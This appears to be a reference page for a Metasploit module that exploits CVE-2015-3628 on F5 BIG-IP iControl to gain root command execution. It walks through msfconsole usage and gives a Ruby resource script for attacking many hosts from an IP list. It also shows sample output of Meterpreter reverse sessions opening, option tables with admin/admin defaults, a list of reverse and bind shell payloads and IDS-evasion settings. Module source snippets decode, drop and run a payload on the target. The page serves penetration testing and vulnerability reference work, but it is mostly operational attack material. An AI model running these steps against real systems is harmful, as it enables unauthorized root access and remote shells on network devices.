F5 iControl iCall::Script Root Command Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/f5_icall_cmd metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: F5 iControl iCall::Script Root Command Execution
Module: exploit/linux/http/f5_icall_cmd
Source code: modules/exploits/linux/http/f5_icall_cmd.rb
Disclosure date: 2015-09-03
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2015-3628

This module exploits an authenticated privilege escalation vulnerability in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). This requires valid credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using f5_icall_cmd against a single host

Normally, you can use exploit/linux/http/f5_icall_cmd this way:

msf > use exploit/linux/http/f5_icall_cmd
msf exploit(f5_icall_cmd) > show targets
    ... a list of targets ...
msf exploit(f5_icall_cmd) > set TARGET target-id
msf exploit(f5_icall_cmd) > show options
    ... show and set options ...
msf exploit(f5_icall_cmd) > exploit

Using f5_icall_cmd against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your f5_icall_cmd will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/f5_icall_cmd")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/f5_icall_cmd exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/f5_icall_cmd

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(linux/http/f5_icall_cmd) > show info

       Name: F5 iControl iCall::Script Root Command Execution
     Module: exploit/linux/http/f5_icall_cmd
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-09-03

Provided by:
  tom
  Jon Hart <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   F5 BIG-IP LTM 11.x

Check supported:
  Yes

Basic options:
  Name          Current Setting               Required  Description
  ----          ---------------               --------  -----------
  HttpPassword  admin                         yes       The password to authenticate with
  HttpUsername  admin                         yes       The username to authenticate with
  Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         443                           yes       The target port (TCP)
  SSL           true                          yes       Use SSL
  TARGETURI     /iControl/iControlPortal.cgi  yes       The base path to the iControl installation
  VHOST                                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authenticated privilege escalation 
  vulnerability in the iControl API on the F5 BIG-IP LTM (and likely 
  other F5 devices). This requires valid credentials and the Resource 
  Administrator role. The exploit should work on BIG-IP 11.3.0 - 
  11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references 
  for more details)

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-3628
  https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html
  https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html

Module Options


This is a complete list of options available in the linux/http/f5_icall_cmd exploit:

msf6 exploit(linux/http/f5_icall_cmd) > show options

Module options (exploit/linux/http/f5_icall_cmd):

   Name          Current Setting               Required  Description
   ----          ---------------               --------  -----------
   HttpPassword  admin                         yes       The password to authenticate with
   HttpUsername  admin                         yes       The username to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         443                           yes       The target port (TCP)
   SSL           true                          yes       Use SSL
   TARGETURI     /iControl/iControlPortal.cgi  yes       The base path to the iControl installation
   VHOST                                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   F5 BIG-IP LTM 11.x

Advanced Options


Here is a complete list of advanced options supported by the linux/http/f5_icall_cmd exploit:

msf6 exploit(linux/http/f5_icall_cmd) > show advanced

Module advanced options (exploit/linux/http/f5_icall_cmd):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ARG_MAX                 131072                                              yes       Command line length limit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FILENAME                                                                    no        File name of the dropped payload, defaults to random
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   PATH                    /tmp                                                yes       Filesystem path for the dropped payload
   SESSION_WAIT            5                                                   yes       The max time to wait for a session, in seconds
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/f5_icall_cmd module can exploit:

msf6 exploit(linux/http/f5_icall_cmd) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   F5 BIG-IP LTM 11.x

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/f5_icall_cmd exploit:

msf6 exploit(linux/http/f5_icall_cmd) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   19  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   20  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   21  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   22  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   23  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   24  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   25  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   26  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   27  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   28  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   29  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   30  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   31  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   32  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   33  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   34  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   35  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   36  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   37  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   38  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   39  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   40  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   41  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   42  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   43  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   44  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   45  payload/generic/custom                                       normal  No     Custom Payload
   46  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   47  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/f5_icall_cmd exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/f5_icall_cmd) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No response


Here is a relevant code snippet related to the "No response" error message:

106:	      'password' => datastore['HttpPassword']
107:	    )
108:	    if res
109:	      return res
110:	    else
111:	      vprint_error('No response')
112:	    end
113:	    false
114:	  end
115:	
116:	  def create_script(name, cmd)

Error while cleaning up script <SCRIPT_NAME>


Here is a relevant code snippet related to the "Error while cleaning up script <SCRIPT_NAME>" error message:

136:	          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
137:	          xml.item script_name
138:	        end
139:	      end
140:	    end
141:	    print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
142:	    res
143:	  end
144:	
145:	  def script_exists?(script_name)
146:	    exists_xml = build_xml do |xml|

Trigger creation failed -- HTTP/<RES.PROTO> <RES.CODE> <RES.MESSAGE>


Here is a relevant code snippet related to the "Trigger creation failed -- HTTP/<RES.PROTO> <RES.CODE> <RES.MESSAGE>" error message:

175:	    res = send_soap_request(handler_xml)
176:	    if res
177:	      if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
178:	        true
179:	      else
180:	        print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
181:	        false
182:	      end
183:	    else
184:	      print_error("No response to trigger creation")
185:	      false

No response to trigger creation


Here is a relevant code snippet related to the "No response to trigger creation" error message:

179:	      else
180:	        print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
181:	        false
182:	      end
183:	    else
184:	      print_error("No response to trigger creation")
185:	      false
186:	    end
187:	  end
188:	
189:	  def delete_handler(handler_name)

Error while cleaning up handler <HANDLER_NAME>


Here is a relevant code snippet related to the "Error while cleaning up handler <HANDLER_NAME>" error message:

194:	          xml.item handler_name
195:	        end
196:	      end
197:	    end
198:	
199:	    print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
200:	    res
201:	  end
202:	
203:	  def handler_exists?(handler_name)
204:	    handler_xml = build_xml do |xml|

HTTP/<RES.PROTO> <RES.CODE> <RES.MESSAGE> -- incorrect USERNAME or PASSWORD?


Here is a relevant code snippet related to the "HTTP/<RES.PROTO> <RES.CODE> <RES.MESSAGE> -- incorrect USERNAME or PASSWORD?" error message:

216:	    # any other response is considered not vulnerable
217:	    res = create_script('', '')
218:	    if res && res.code == 500 && res.body =~ /path is empty/
219:	      return Exploit::CheckCode::Appears
220:	    elsif res && res.code == 401
221:	      print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
222:	      return Exploit::CheckCode::Unknown
223:	    else
224:	      return Exploit::CheckCode::Safe
225:	    end
226:	  end

Payload <PAYLOAD> is too big, try a different payload


Here is a relevant code snippet related to the "Payload <PAYLOAD> is too big, try a different payload" error message:

230:	    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
231:	    cmd = %(exec /bin/sh -c "#{shell_cmd}")
232:	
233:	    arg_max = datastore['ARG_MAX']
234:	    if shell_cmd.size > arg_max
235:	      print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
236:	        "or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
237:	      return false
238:	    end
239:	
240:	    script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"

Upload payload script failed -- HTTP/<CREATE_SCRIPT_RES.PROTO>


Here is a relevant code snippet related to the "Upload payload script failed -- HTTP/<CREATE_SCRIPT_RES.PROTO>" error message:

242:	    unless (create_script_res = create_script(script_name, cmd))
243:	      print_error("No response when uploading payload script")
244:	      return false
245:	    end
246:	    unless create_script_res.code == 200
247:	      print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
248:	                  "#{create_script_res.code} #{create_script_res.message}")
249:	      return false
250:	    end
251:	    unless script_exists?(script_name)
252:	      print_error("Payload script uploaded successfully but script was not found")

Trigger created successfully but was not found


Here is a relevant code snippet related to the "Trigger created successfully but was not found" error message:

259:	    unless create_handler(handler_name, script_name)
260:	      delete_script(script_name)
261:	      return false
262:	    end
263:	    unless handler_exists?(handler_name)
264:	      print_error("Trigger created successfully but was not found")
265:	      delete_script(script_name)
266:	      return false
267:	    end
268:	    print_status('Waiting for payload to execute...')
269:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • tom
  • Jon Hart <jon_hart[at]rapid7.com>

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.